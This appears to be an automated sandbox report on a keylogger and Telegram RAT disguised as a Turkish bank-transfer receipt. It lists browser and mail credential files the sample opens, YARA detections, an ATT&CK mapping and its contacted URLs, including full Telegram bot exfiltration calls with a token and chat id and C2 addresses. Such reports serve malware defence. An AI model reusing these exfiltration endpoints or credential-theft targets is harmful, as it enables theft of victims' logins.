Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process created: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"	Jump to behavior

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager\

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7540, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7540, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7540, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7540, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7540, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	112 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	112 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	13 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	68%	ReversingLabs	Win32.Trojan.Leonem
dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	100%	Avira	HEUR/AGEN.1305388
dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://51.38.247.67:8081/_send_.php?L	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.fb-t-msedge.net	13.107.253.45	true	false	high
reallyfreegeoip.org	104.21.96.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false	high
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:082561%0D%0ADate%20and%20Time:%2010/01/2025%20/%2003:04:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20082561%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://aborters.duckdns.org:8081	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp	false		high
